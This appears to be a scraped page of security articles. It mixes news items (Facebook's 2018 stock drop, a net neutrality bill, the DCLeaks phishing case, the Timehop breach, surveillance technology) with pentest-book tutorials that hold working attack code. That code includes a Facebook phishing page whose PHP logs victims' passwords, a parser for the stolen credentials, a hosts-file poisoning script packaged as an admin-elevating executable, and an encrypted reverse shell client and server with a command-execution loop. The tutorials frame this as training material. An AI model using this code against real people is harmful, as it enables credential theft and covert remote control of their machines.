How-To Tutorials - Security

172 Articles

Why Wall Street unfriended Facebook: Stocks fell $120 billion in market value after Q2 2018 earnings call

Natasha Mathur
27 Jul 2018
6 min read
After being found guilty of serving discriminatory advertisements on its platform earlier this week, Facebook hit yet another wall yesterday as its stock closed down 18.96% on Thursday, with shares trading at $176.26. The company lost around $120 billion in market value overnight, the largest single-day loss of value ever for a US-traded company, eclipsing Intel Corp's crash two decades ago, when Intel lost a little over $18 billion in a single day. Despite 41.24% revenue growth compared to last year, this was Facebook's biggest stock market drop ever.

[Chart: Facebook stock price, NASDAQ]

Facebook's market capitalization stood at roughly $629.6 billion on Wednesday. As soon as Facebook's earnings call concluded at the end of market trading on Thursday, its worth dropped to $510 billion after the close. As Facebook's shares continued to fall during Thursday's trading, CEO Mark Zuckerberg was left with less than $70 billion, wiping out nearly $17 billion of his personal stake, according to Bloomberg. He was also demoted from third to sixth place on Bloomberg's Billionaires Index.

Active user growth is starting to stagnate in mature markets

According to David Wehner, CFO at Facebook, "the Daily active users count on Facebook reached 1.47 billion, up 11% compared to last year, led by growth in India, Indonesia, and the Philippines. This number represents approximately 66% of the 2.23 billion monthly active users in Q2".

[Chart: Facebook's daily active users]

He also mentioned that "MAUs (monthly active users) were up 228M or 11% compared to last year. It is worth noting that MAU and DAU in Europe were both down slightly quarter-over-quarter due to the GDPR rollout, consistent with the outlook we gave on the Q1 call".

[Chart: Facebook's monthly active users]

Facebook has, in fact, implemented several privacy policy changes over the last few months in response to the European Union's General Data Protection Regulation (GDPR), and the company's earnings report revealed the effects of the GDPR rules.

Revenue growth rate is falling too

Speaking of revenue expectations, Wehner gave investors a heads-up that revenue growth rates will decline in the third and fourth quarters. Wehner stated that the company's "total revenue growth rate decelerated approximately 7 percentage points in Q2 compared to Q1. Our total revenue growth rates will continue to decelerate in the second half of 2018, and we expect our revenue growth rates to decline by high single-digit percentages from prior quarters sequentially in both Q3 and Q4." Facebook reiterated that these numbers won't get better anytime soon.

[Chart: Facebook's Q2 2018 revenue]

Wehner further explained the reasons for the decline in revenue: "There are several factors contributing to that deceleration... we expect the currency to be a slight headwind in the second half... we plan to grow and promote certain engaging experiences like Stories that currently have lower levels of monetization. We are also giving people who use our services more choices around data privacy which may have an impact on our revenue growth."

Let's look at other performance indicators

Other financial highlights of Q2 2018 are as follows: Mobile advertising revenue represented 91% of advertising revenue for Q2 2018, up from approximately 87% of advertising revenue in Q2 2017. Capital expenditures for Q2 2018 were $3.46 billion, up from $1.4 billion in Q2 2017. Headcount was 30,275 as of June 30, an increase of 47% year-over-year. Cash, cash equivalents, and marketable securities were $42.3 billion at the end of Q2 2018, up from $35.45 billion at the end of Q2 2017. Wehner also mentioned that the company "continue[s] to expect that full-year 2018 total expenses will grow in the range of 50-60% compared to last year. In addition to increases in core product development and infrastructure -- growth is driven by increasing investments -- safety & security, AR/VR, marketing, and content acquisition".

Another reason for the overall loss is that Facebook has been dealing with criticism for quite some time now over its content policies, its handling of users' private data, and its changing rules for advertisers. It is currently investigating the data analytics firm Crimson Hexagon over misuse of data. On a conference call with financial analysts, Mark Zuckerberg also said that Facebook has been investing heavily in "safety, security, and privacy", and that this investment in security "will start to impact our profitability, we're starting to see that this quarter - we run this company for the long term, not for the next quarter".

Here's what the public feels about the recent wipe-out:
https://twitter.com/TeaPainUSA/status/1022586648155054081
https://twitter.com/alistairmilne/status/1022550933014753280

So, why did Facebook's stocks crash?

As far as revenue goes, Facebook's Q2 2018 performance was better than its performance in the same quarter last year. Ironically, scandals and lawsuits have had little impact on Facebook's growth. For example, Facebook recovered fully from the Cambridge Analytica scandal within two months as far as share prices are concerned. The Mueller indictment released earlier this month managed to arrest growth for merely a couple of days before the company bounced back. The discriminatory advertising verdict against Facebook had no impact on its bullish growth earlier this week.

This leads us to conclude that public sentiment and market reactions against Facebook have very different underlying reasons. The market's strong reaction is mainly driven by concerns over the slowdown in active user growth, the lack of monetization opportunities on the more popular Instagram platform, and Facebook's perceived inability to adapt successfully to new political and regulatory regimes such as the GDPR. Wall Street has been indifferent to Facebook's long list of scandals, in some ways enabling the company's 'move fast and break things' approach. On Thursday's earnings call, Zuckerberg hinted that Facebook may no longer be keen on 'growth at all costs', saying things like "we're investing so much in security that it will significantly impact our profitability", with Wehner adding, "Looking beyond 2018, we anticipate that total expense growth will exceed revenue growth in 2019." And that has Wall Street unfriending Facebook with just a click of a button!

Read next:
Is Facebook planning to spy on you through your mobile's microphones?
Facebook to launch AR ads on its news feed to let you try on products virtually
Decoding the reasons behind Alphabet's record high earnings in Q2 2018


Furthering the Net Neutrality debate, GOP proposes the 21st Century Internet Act

Sugandha Lahoti
18 Jul 2018
3 min read
GOP Rep. Mike Coffman has proposed a new bill to solidify the principles of net neutrality into law, rather than leaving them as a set of rules the FCC can modify every year. The bill, known as the 21st Century Internet Act, would ban providers from blocking, throttling, or offering paid fast lanes. It would also forbid them from engaging in paid prioritization and from charging access fees to edge providers. It could take some time for the bill to come to a vote in Congress; much depends on the makeup of Congress after the midterm elections.

The 21st Century Internet Act amends the Communications Act of 1934, adding a new Title VIII full of conditions specific to internet providers. This new title permanently codifies into law the 'four corners' of net neutrality. The bill proposes these measures:

No blocking: A broadband internet access service provider cannot block lawful content, or charge an edge provider a fee to avoid having its content blocked.
No throttling: The service provider cannot degrade or enhance (slow down or speed up) internet traffic.
No paid prioritization: The internet access provider may not engage in paid preferential treatment.
No unreasonable interference: The service provider cannot interfere with the ability of end users to select the internet access service of their choice.

The bill aims to settle the long-running debate over whether internet access is an information service or a telecommunications service. In his letter to FCC Chairman Ajit Pai, Coffman writes, "The Internet has been and remains a transformative tool, and I am concerned any action you may take to alter the rules under which it functions may well have significant unanticipated negative consequences."

As far as the FCC's role is concerned, the 21st Century Internet Act would solidify the rules of net neutrality and bar the FCC from modifying them. The commission would solely be responsible for overseeing the bill's implementation and enforcing the law, which would include investigating unfair acts or practices such as false advertising and misrepresenting the product.

The Senate has already voted to save net neutrality by passing a Congressional Review Act (CRA) measure back in May 2018. The CRA resolution passed 52-47, seeking to overturn the FCC's repeal and keep the net neutrality rules on the books. The 21st Century Internet Act is being seen in a good light by the Internet Association, which represents Google, Facebook, Netflix, and others; it commended Coffman on his bill and called it a "step in the right direction." For the rest of us, it will be interesting to watch the bill's progress and fate as it goes through the voting process and then to the White House for final approval.

Read next:
5 reasons why the government should regulate technology
DCLeaks and Guccifer 2.0: How hackers used social engineering to manipulate the 2016 U.S. elections
Tech, unregulated: Washington Post warns Robocalls could get worse


DCLeaks and Guccifer 2.0: How hackers used social engineering to manipulate the 2016 U.S. elections

Savia Lobo
16 Jul 2018
5 min read
It's been more than a year since the Republican party's Donald Trump won the U.S. presidential election against Democrat Hillary Clinton. Robert Mueller recently indicted 12 Russian military officers for meddling in the 2016 U.S. presidential election. The officers had hacked into the Democratic National Committee, the Democratic Congressional Campaign Committee, and the Clinton campaign. Mueller's indictment states that the Russians did it using the Guccifer 2.0 and DCLeaks personas, following which Twitter decided to suspend both accounts on its platform.

According to the San Diego Union-Tribune, Twitter found that the handles of both Guccifer 2.0 and DCLeaks had been dormant for more than a year and a half. It also verified that the accounts had been loaded with disseminated emails stolen from both Clinton's camp and the Democratic Party's organization. It has since suspended both accounts.

Guccifer 2.0 is an online persona created by the conspirators, who falsely claimed to be a Romanian hacker in order to obscure evidence of Russian involvement in the 2016 U.S. presidential election. The persona is also associated with the leaks of documents from the Democratic National Committee (DNC) through WikiLeaks. DCLeaks published the stolen data on the website dcleaks.com; the site is known to be a front for the Russian cyberespionage group Fancy Bear. Mueller, in his indictment, stated that both Guccifer 2.0 and DCLeaks have ties to the GRU (the Russian military intelligence unit called the Main Intelligence Directorate).

How the hackers social engineered their way into the Clinton campaign

The attackers used the technique known as spear phishing, and the malware used in the process was X-Agent, a tool that can collect documents, keystrokes, and other information from computers and smartphones and send it through encrypted channels back to servers owned by the hackers.

As per Mueller's indictment, the conspirators created an email account in the name of a known member of the Clinton campaign. The address deviated from the real one by a single letter and looked almost identical to it. Spear phishing emails were sent from this fake account to the work accounts of more than thirty different Clinton campaign employees. The embedded link within these spear phishing emails appeared to direct the recipient to a document titled 'hillary-clinton-favorable-rating.xlsx', but in reality the recipients were being directed to a GRU-created website. X-Agent uses an encrypted tunneling tool known as X-Tunnel, which connected to known GRU-associated servers.

Using the X-Agent malware, the GRU agents had targeted more than 300 individuals within the Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee by March 2016. At the same time, the hackers stole nearly 50,000 emails from the Clinton campaign, and by June 2016 they had gained control over 33 DNC computers and infected them with the malware. The indictment further explains that although the attackers tried to hide their tracks by erasing activity logs, the Linux-based version of X-Agent, programmed with the GRU-registered domain "linuxkrnl.net", was discovered in these networks.

Was the Trump campaign impervious to such an attack?

Roger Stone, a former Trump campaign adviser, was said to be in contact with Guccifer 2.0 during the presidential campaign. As per Mueller's indictment, Guccifer 2.0 sent Stone this message: "Please tell me if i can help u anyhow...it would be a great pleasure for me...What do u think about the info on the turnout model for the democrats entire presidential campaign." "Pretty standard" was the reply given to Guccifer 2.0. Stone has since said that his conversations with the person behind the account were "innocuous", adding, "This exchange is entirely public and provides no evidence of collaboration or collusion with Guccifer 2.0 or anyone else in the alleged hacking of the DNC emails." Stone also stated that he never discussed these communications with Trump or his presidential campaign.

Rod Rosenstein, U.S. Deputy Attorney General, has indicated that this Russian attack was part of the Kremlin's multifaceted approach to boosting Trump's 2016 campaign while undermining Clinton's.

Twitter stated that both accounts were suspended for being connected to a network of accounts previously suspended for operating in violation of its rules. Hillary Clinton's supporters, however, expressed their anger, saying Twitter's response was too slow and too little.

With the midterm elections only months away, one question on everyone's mind is: how are the intelligence community and the Department of Justice going to ensure the elections are fair and secure? There is a high chance of such attacks recurring. Asked a similar question at a cybersecurity conference, Homeland Security Secretary Kirstjen Nielsen responded, "Today I can say with confidence that we know whom to contact in every state to share threat information. That ability did not exist in 2016."

[Video: Rod Rosenstein's interview with PBS NewsHour]

Read next:
Social engineering attacks – things to watch out for while online!
YouTube has a $25 million plan to counter fake news and misinformation
Twitter allegedly deleted 70 million fake accounts in an attempt to curb fake news
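The indictment's detail about a sender address that differed from a real staffer's by a single character is worth dwelling on, because that pattern is cheap to screen for. The following is an illustrative defensive sketch, not something taken from the indictment or this article: it flags inbound sender addresses that sit within one edit of a known colleague's address. All addresses shown are hypothetical.

    # Illustrative check for lookalike sender addresses (one-character
    # deviations), inspired by the spear phishing technique described above.
    def edit_distance(a, b):
        # Classic dynamic-programming Levenshtein distance.
        prev = range(len(b) + 1)
        for i, ca in enumerate(a, 1):
            curr = [i]
            for j, cb in enumerate(b, 1):
                curr.append(min(prev[j] + 1,                 # deletion
                                curr[j - 1] + 1,             # insertion
                                prev[j - 1] + (ca != cb)))   # substitution
            prev = curr
        return prev[-1]

    def is_lookalike(sender, known_addresses):
        # True if the sender is *almost* (but not exactly) a known address.
        sender = sender.lower()
        return any(0 < edit_distance(sender, known.lower()) <= 1
                   for known in known_addresses)

    # Hypothetical example: 'o' swapped for '0' in the local part.
    staff = ["jane.doe@example-campaign.org"]
    print(is_lookalike("jane.d0e@example-campaign.org", staff))  # True

A check like this obviously does not stop spear phishing on its own, but it illustrates how small the deviation that fooled thirty-plus recipients actually was.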


Timehop suffers data breach; 21 million users' data compromised

Richard Gall
09 Jul 2018
3 min read
Timehop, the social media application that resurfaces your old posts in your feed, experienced a data breach on July 4. In a post published yesterday (July 8), the team explained that 'an access credential to our cloud computing environment was compromised'. Timehop believes 21 million users have been affected by the breach. However, it was keen to state that "we have no evidence that any accounts were accessed without authorization."

Timehop has already acted to make the necessary changes. Certain application features have been temporarily disabled, and users have been logged out of the app. Users will also have to re-authenticate Timehop on their social media accounts, as the team has deactivated the keys that allow the app to read and show users' social media posts in their feeds. Timehop explained that the gap between the incident and the public statement was due to the need to make "contact with a large number of partners": the investigation needed to be thorough in order for the response to be clear and coordinated.

How did the Timehop data breach happen?

For transparency, Timehop published a detailed technical report on how it believes the hack happened. An unauthorized user first accessed Timehop's cloud computing environment using an authorized user's credentials and, after creating a new administrative account, conducted 'reconnaissance activities'. This user logged in to the account on several further occasions in March and June 2018. It was only on July 4 that the attacker attempted to access the production database. Timehop states that a "specific action... triggered an alarm", which allowed engineers to act quickly to stop the attack from continuing. Once this was done, there was a detailed and thorough investigation, which included analyzing the attacker's activity on the network and auditing all security permissions and processes.

A measured response to a potential crisis

It's worth noting just how methodical Timehop's response has been. Yes, there will be question marks over the delay, but it does make a lot of sense. Timehop revealed that the news was provided to some journalists "under embargo in order to determine the most effective ways to communicate what had happened while neither causing panic nor resorting to bland euphemism." The incident demonstrates that effective cybersecurity is as much about a robust communication strategy as it is about secure software.

Read next:
Did Facebook just have another security scare?
What security and systems specialists are planning to learn in 2018


Phish for Facebook passwords with DNS manipulation [Tutorial]

Savia Lobo
09 Jul 2018
6 min read
Password phishing can result in the loss of a user's identity and confidential details, which can lead to financial losses and can even lock users out of their own accounts. In this article, we will see how an attacker can take advantage of manipulating the DNS record for Facebook, redirect traffic to a phishing page, and grab the account password. This article is an excerpt taken from 'Python For Offensive PenTest', written by Hussam Khrais.

Facebook password phishing

First, we need to set up a phishing page. You need not be an expert in web programming; you can easily Google the steps for preparing a phishing page. To create one, open your browser and navigate to the Facebook login page. Then, on the browser menu, click on File and then on Save page as..., making sure that you choose a complete page from the drop-down menu. The output should be an .html file.

Now let's extract some data. Open the Phishing folder from the code files provided with this book and rename the Facebook HTML page index.html. Inside this HTML, we have to change the login form. If you search for action=, you will find it. Here, we change the login form to redirect the request to a custom PHP page called login.php, and we also change the request method to GET instead of POST. A login.php page is included in the same Phishing directory. If you open the file, you will find the following script:

    <?php
    header("Location: http://www.facebook.com/home.php? ");
    $handle = fopen("passwords.txt", "a");
    foreach($_GET as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

As soon as our target clicks on the Log In button, the submitted data is sent as a GET request to this login.php, which stores it in our passwords.txt file and then closes the file. Next, we create the passwords.txt file, where the target credentials will be stored. Now we copy all of these files into /var/www/ and start the Apache service. If we open the index.html page locally, we will see the phishing page exactly as the target will see it.

Let's quickly recap what happens when the target clicks on the Log In button: the target's credentials are sent as a GET request to login.php (because we modified the action parameter to point there), and login.php then stores the data in the passwords.txt file.

Before we start the Apache service, let's make sure we have an IP address. Enter the following command:

    ifconfig eth0

You can see that we are running on 10.10.10.100. We then start the Apache service using:

    service apache2 start

Let's verify that we are listening on port 80, and that the service listening is Apache:

    netstat -antp | grep "80"

Now, let's jump to the target side for a second. In the previous section, we used google.jo in our script; here, we have already modified that script to redirect the Facebook traffic to our attacker machine instead. So, all our target has to do is double-click on the EXE file. Now, to verify, let us start Wireshark and then start the capture.

We will filter on the attacker IP, which is 10.10.10.100. Open the browser and navigate to https://www.facebook.com/. Once we do this, we're taken to the phishing page instead. You will see that the destination IP is the Kali IP address: on the target side, when we hit https://www.facebook.com/, we are actually viewing the index.html page set up on the Kali machine. Once the victim clicks on the login page, the data is sent as a GET request to login.php and stored in passwords.txt, which is currently empty.

Now, log into your Facebook account using your username and password, then jump to the Kali side and see if we get anything in the passwords.txt file. You can see it is still empty. This is because, by default, we have no permission to write data. To fix this, we will give all files full privileges, that is, read, write, and execute:

    chmod -R 777 /var/www/

Note that we do this because we are running in a VirtualBox environment. If you have a web server exposed to the public, it's bad practice to give full permissions to all of your files, because of privilege escalation attacks: an attacker may upload a malicious file, or manipulate the files and then browse to the file location to execute a command of their own. After setting the permissions, we stop and start the Apache server just in case:

    service apache2 stop
    service apache2 start

After making this modification, go to the target machine and try to log into Facebook one more time. Then, go to Kali and open passwords.txt. You will now see the submitted data from the target side, including the username and the password. In the end, a telltale sign of a phishing page is the missing https indicator.

We performed the password phishing process using Python. If you have enjoyed reading this excerpt, do check out 'Python For Offensive PenTest' to learn how to protect yourself and secure your accounts from these attacks, code your own scripts, and master ethical hacking from scratch.

Read next:
Phish for passwords using DNS poisoning [Tutorial]
How to secure a private cloud using IAM
How cybersecurity can help us secure cyberspace
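For quick triage of what the phishing page captured, a short helper can parse the passwords.txt file that login.php appends to. This is a minimal sketch and not part of the original excerpt: it assumes the key=value-per-line format written by the PHP snippet above (with a blank line between submissions), and field names such as email and pass depend on the saved Facebook form, so treat them as placeholders.

    # parse_passwords.py - illustrative helper for the passwords.txt log
    # written by the login.php snippet above (one field per line, blank
    # line between submissions). Field names are assumptions.

    def parse_submissions(path="passwords.txt"):
        submissions, current = [], {}
        with open(path) as handle:
            for line in handle:
                line = line.strip()
                if not line:              # a blank line ends one submission
                    if current:
                        submissions.append(current)
                        current = {}
                    continue
                key, _, value = line.partition("=")
                current[key] = value
        if current:
            submissions.append(current)
        return submissions

    if __name__ == "__main__":
        for entry in parse_submissions():
            # 'email' and 'pass' are whatever names the saved form used
            print("%s %s" % (entry.get("email"), entry.get("pass")))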


Protect your TCP tunnel by implementing AES encryption with Python [Tutorial]

Savia Lobo
15 Jun 2018
7 min read
TCP (Transmission Control Protocol) is used to streamline important communications. TCP works with the Internet Protocol (IP), which defines how computers send packets of data to each other. It is therefore highly important to secure this data to avoid MITM (man-in-the-middle) attacks. In this article, you will learn how to protect your TCP tunnel using Advanced Encryption Standard (AES) encryption to protect its traffic in the transit path. This article is an excerpt taken from 'Python For Offensive PenTest', written by Hussam Khrais.

Protecting your tunnel with AES

In this section, we will protect our TCP tunnel with AES encryption. Generally speaking, AES encryption can operate in two modes: the Counter (CTR) mode (also called the stream mode) and the Cipher Block Chaining (CBC) mode (also called the block mode).

Cipher Block Chaining (CBC) mode encryption

The block mode means that we need to send data in the form of chunks. For instance, if we have a block size of 512 bytes and we want to send 500 bytes, we need to add 12 bytes of additional padding to reach 512 bytes in total. If we want to send 514 bytes, the first 512 bytes are sent in one chunk and the next chunk carries the remaining 2 bytes; however, we cannot send 2 bytes alone, so we need to add 510 bytes of padding to bring the second chunk up to 512 bytes. On the receiver side, you then need to reverse the steps by removing the padding and decrypting the message.

Counter (CTR) mode encryption

Now, let's jump to the other mode, the Counter (CTR) mode, or stream mode. Here, the message size does not matter, since we are not limited to a block size; we encrypt in stream mode, just like XOR does. The block mode is considered stronger by design than the stream mode. In this section, we will implement the stream mode, and I will leave it to you to research and implement the block mode.

The most well-known library for cryptography in Python is called PyCrypto. For Windows, there is a compiled binary for it, and for the Kali side, you just need to run the setup file after downloading the library. You can download the library from http://www.voidspace.org.uk/python/modules.shtml#pycrypto. As a start, we will use AES without TCP or HTTP tunneling:

    # Python For Offensive PenTest
    # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
    # http://www.voidspace.org.uk/python/modules.shtml#pycrypto
    # Download Pycrypto source
    # https://pypi.python.org/pypi/pycrypto
    # For Kali, after extracting the tar file, invoke "python setup.py install"

    # AES Stream

    import os
    from Crypto.Cipher import AES

    counter = os.urandom(16)  # CTR counter string value with a length of 16 bytes
    key = os.urandom(32)      # AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long

    # Instantiate a crypto object called enc
    enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    encrypted = enc.encrypt("Hussam"*5)
    print encrypted

    # And a crypto object for decryption
    dec = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
    decrypted = dec.decrypt(encrypted)
    print decrypted

The code is quite straightforward. We start by importing the os library and the AES class from the Crypto.Cipher library. We then use the os library to create a random key and a random counter. The counter length is 16 bytes, and we go for a 32-byte key in order to implement AES-256.

Next, we create an encryption object by passing the key, the AES mode (the stream or CTR mode), and the counter value. Note that the counter is required to be passed as a callable object, which is why we use a lambda construct: a sort of anonymous function that is not bound to a name. The decryption is quite similar to the encryption process: we create a decryption object, pass it the encrypted message, and finally print out the decrypted message, which should again be clear text.

Let's quickly test this script by encrypting my name. Once we run the script, the encrypted version is printed first and the decrypted, clear-text version below it:

    >>>
    ]ox:|s
    Hussam
    >>>

To test the message size, the script multiplies the name by 5, so the message is five times longer. The size of the clear-text message does not matter here: whatever the clear-text message is, the stream mode handles it with no problem at all.

Now, let us integrate our encryption functions into our TCP reverse shell. The following is the client-side script:

    # Python For Offensive PenTest
    # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
    # http://www.voidspace.org.uk/python/modules.shtml#pycrypto
    # Download Pycrypto source
    # https://pypi.python.org/pypi/pycrypto
    # For Kali, after extracting the tar file, invoke "python setup.py install"

    # AES - Client - TCP Reverse Shell

    import socket
    import subprocess
    from Crypto.Cipher import AES

    counter = "H"*16
    key = "H"*32

    def encrypt(message):
        encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
        return encrypto.encrypt(message)

    def decrypt(message):
        decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
        return decrypto.decrypt(message)

    def connect():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.10.100', 8080))
        while True:
            command = decrypt(s.recv(1024))
            print ' We received: ' + command
            ...

What has been added is an encryption function and a decryption function on each side and, as you can see, the key and the counter values are hardcoded on both sides. A side note: we will see later, in hybrid encryption, how we can generate a random value on the Kali machine and transfer it securely to our target, but for now, let's keep it hardcoded here. The following is the server-side script:

    # Python For Offensive PenTest
    # Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
    # http://www.voidspace.org.uk/python/modules.shtml#pycrypto
    # Download Pycrypto source
    # https://pypi.python.org/pypi/pycrypto
    # For Kali, after extracting the tar file, invoke "python setup.py install"

    # AES - Server - TCP Reverse Shell

    import socket
    from Crypto.Cipher import AES

    counter = "H"*16
    key = "H"*32

    def connect():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("10.10.10.100", 8080))
        s.listen(1)
        print '[+] Listening for incoming TCP connection on port 8080'
        conn, addr = s.accept()
        print '[+] We got a connection from: ', addr
        ...

This is how it works: before sending anything, we pass whatever we want to send to the encryption function first. When we get the shell prompt, our input is passed to the encryption function and then sent out over the TCP socket. If we jump to the target side, it's almost a mirror image: when we receive an encrypted message, we pass it to the decryption function, and the decryption returns the clear-text value. Also, before sending anything back to the Kali machine, we encrypt it first, just as we did on the Kali side.

Now, run the script on both sides, keeping Wireshark running in the background on the Kali side, and start with ipconfig. On the target side, we are able to decrypt the encrypted message back to clear text successfully. To verify that we have encryption on the transit path, right-click on the relevant IP in Wireshark and select Follow TCP Stream: you will see that the message was encrypted before being sent out over the TCP socket.

To summarize, we learned to safeguard our TCP tunnel during the passage of information using the AES encryption algorithm. If you've enjoyed reading this tutorial, do check out Python For Offensive PenTest to learn how to protect the TCP tunnel using RSA.

Read next:
IoT Forensics: Security in an always connected world where things talk
Top 5 penetration testing tools for ethical hackers
Top 5 cloud security threats to look out for in 2018
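The excerpt elides the body of the client's command loop with "...". As a rough sketch of how the encrypt() and decrypt() helpers slot into the reverse shell, the client side might look something like the following. It assumes the imports and helper functions from the client script above; the 'terminate' kill switch and the 1024-byte receive size are assumptions in the style of a typical reverse shell, not the author's verbatim code.

    # Hypothetical continuation of the client-side loop; assumes the
    # encrypt()/decrypt() helpers and the socket/subprocess imports from
    # the client script above.
    def shell_loop(s):
        while True:
            command = decrypt(s.recv(1024))          # decrypt whatever Kali sent
            if 'terminate' in command:               # assumed kill switch
                s.close()
                break
            proc = subprocess.Popen(command, shell=True,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE,
                                    stdin=subprocess.PIPE)
            result = proc.stdout.read() + proc.stderr.read()
            s.send(encrypt(result))                  # encrypt before sending back

The point of the sketch is simply that every s.send() is wrapped in encrypt() and every s.recv() in decrypt(), so the plain-text command channel of the earlier chapters never touches the wire.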

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details by luring users into sharing their personal details, for example through emails that appear to come from popular organizations. In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking in which corrupt Domain Name System data is injected into the DNS resolver's cache, causing the name server to return an incorrect record. This method can result in traffic being redirected to the attacker's computer. This article is an excerpt taken from 'Python For Offensive PenTest', written by Hussam Khrais.

Password phishing – DNS poisoning

One of the easiest ways to manipulate the direction of traffic remotely is to play with DNS records. Each operating system contains a hosts file in order to statically map hostnames to specific IP addresses. The hosts file is a plain text file, which can easily be rewritten as long as we have admin privileges. For now, let's have a quick look at the hosts file on Windows, where it is located under C:\Windows\System32\drivers\etc. If you read the description inside the file, you will see that each entry should be on a separate line, and there is a sample of the record format: the IP address comes first, followed by at least one space and then the hostname.

Now, let's see the traffic at the packet level. Open Wireshark on the target machine and start the capture, filtering on the attacker IP address, 10.10.10.100. Click on Apply to complete the process; we can now see the traffic before poisoning the DNS records. Open https://www.google.jo/?gws_rd=ssl, and notice that once we ping the name from the command line, the operating system does a DNS lookup behind the scenes and we get the real IP address.

Now, observe what happens after DNS poisoning. Close all windows except the one running Wireshark. Keep in mind that we must run as admin to be able to modify the hosts file; even when logged in as an admin, you should explicitly right-click the application and choose to run it as administrator. Navigate to the directory where the hosts file is located. Execute dir and you will see the hosts file; run type hosts to see its original contents. Now, enter the following command:

    echo 10.10.10.100 www.google.jo >> hosts

Here, 10.10.10.100 is the IP address of our Kali machine, so once the target goes to google.jo, it should be redirected to the attacker machine. Verify the change by executing type hosts once again. After modifying DNS records, it is always a good idea to flush the DNS cache, to make sure that the updated record is used:

    ipconfig /flushdns

Now, watch what happens after DNS poisoning: open the browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that in Wireshark the traffic goes to the Kali IP address instead of the real IP address of google.jo, because the DNS resolution for google.jo is now 10.10.10.100. We then stop the capture and recover the original hosts file, placing it back in the drivers\etc folder.

Now, let's flush the poisoned DNS cache first by running:

    ipconfig /flushdns

Then, open the browser again. We should reach the real https://www.google.jo/?gws_rd=ssl right now. We are good to go!

Using a Python script

Now we'll automate these steps, this time via a Python script. Open the script and enter the following code:

    # Python For Offensive PenTest
    # DNS_Poisoning

    import subprocess
    import os

    # Change the script directory to ...\drivers\etc, where the hosts file is located on Windows
    os.chdir("C:\Windows\System32\drivers\etc")

    # Append this line to the hosts file: it redirects traffic going to google.jo
    # to the IP 10.10.10.100
    command = "echo 10.10.10.100 www.google.jo >> hosts"
    CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

    # Flush the cached DNS, to make sure that new sessions will use the new DNS record
    command = "ipconfig /flushdns"
    CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

The first thing we do is change our current working directory to the one containing the hosts file, using the os library. Then, using subprocess, we append a static DNS record pointing www.google.jo to 10.10.10.100, the Kali IP address. In the last step, we flush the DNS cache. We can now save the file and export the script as an EXE. Remember that we need the target to execute it as admin. To do that, in the setup file for py2exe, we add a new line, as follows:

    ...
    windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}],
    ...

We have added a new option specifying that when the target executes the EXE file, we will ask to elevate our privileges to admin. Let's run the setup file and start a new capture.

Now, copy the EXE file onto the target's desktop. Notice the little shield on the icon, indicating that this file needs admin privileges, which gives us exactly the result of running as admin. Run the file and verify that the hosts file gets modified: you will see that our line has been added. Now, open a new session to check that we get the redirection. Start a new capture and browse with Firefox. As you will see, the DNS lookup for google.jo points to our IP address, 10.10.10.100.

We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading this post, do check out Python For Offensive PenTest to learn how to hack passwords and perform privilege escalation on Windows with practical examples.

Read next:
12 common malware types you should know
Getting started with Digital forensics using Autopsy
5 pen testing rules of engagement: What to consider while performing Penetration testing


Alarming ways governments are using surveillance tech to watch you

Neil Aitken
14 Jun 2018
12 min read
Mapquest, part of the Verizon company, is the second largest provider of mapping services in the world, after Google Maps. It provides advanced cartography services to companies like Snap and Papa John's Pizza, and it is about to release an app that users can install on their smartphone. The new application will record and transmit video images of what's happening in front of your vehicle as you travel. Data can be sent from any phone with a camera, using the most common of tools: a simple mobile data plan. In exchange, you'll get live traffic updates, among other things.

Mapquest will use the video data it gathers to provide more accurate and up-to-date maps to its partners. The real world is changing all the time: roads get added, and cities re-route traffic from time to time. The new AI-based technology Mapquest employs could well improve the reliability of driverless cars, which have to engage with this ever-changing landscape in a safe manner. No one disagrees with safety improvements, and Mapquest's solution is impressive technology. The fact that the company can use AI to interpret the images it receives and use that information to update maps is incredible. In this regard, it is just one of the myriad daily news stories which excite and astound us.

These stories do, however, often have another side which is rarely acknowledged. In the wrong hands, Mapquest's solution could create a surveillance database which tracked people in real time.

Surveillance technology involves the use of data and information products to capture details about individuals. The act of surveillance is usually undertaken with a view to achieving a goal, and the principle is simple: the more 'they' know about you, the easier it will be to influence you towards their ends. Surveillance information can be used to find you, apprehend you or, potentially, to change your mind without you ever realising you had been watched. Mapquest's innovation is just a single example of surveillance technology in government hands which has expanded in capability far beyond what most people realise.

Read also: What does the US government know about you? The truth beyond the Facebook scandal

Facebook's share price fell 14% in early 2018 as a result of the public outcry over the Cambridge Analytica announcements the company made. The idea that a private company had allowed detailed information about individuals to be provided to a third party without their consent appeared to genuinely shock and appall people. Yet technology tools like Mapquest's tracking capabilities and Facebook's profiling techniques are being taken up and used by police forces and corporate entities around the world. The reality of current private and public surveillance capabilities is that facilities exist, and are in use, to collect and analyse data on most people in the developed world. The known limits of these services may surprise even those who are on the cutting edge of technology. There are so many examples from all over the world listed below that they will genuinely make you want to consider going off grid!

Innovative, ingenious overlords: US companies have a flair for surveillance

The US is the centre of the information-based technology industry, and much of what its companies develop is exported as well as used domestically.

The police are using human genome matching to track down criminals and can find 'any family in the country'

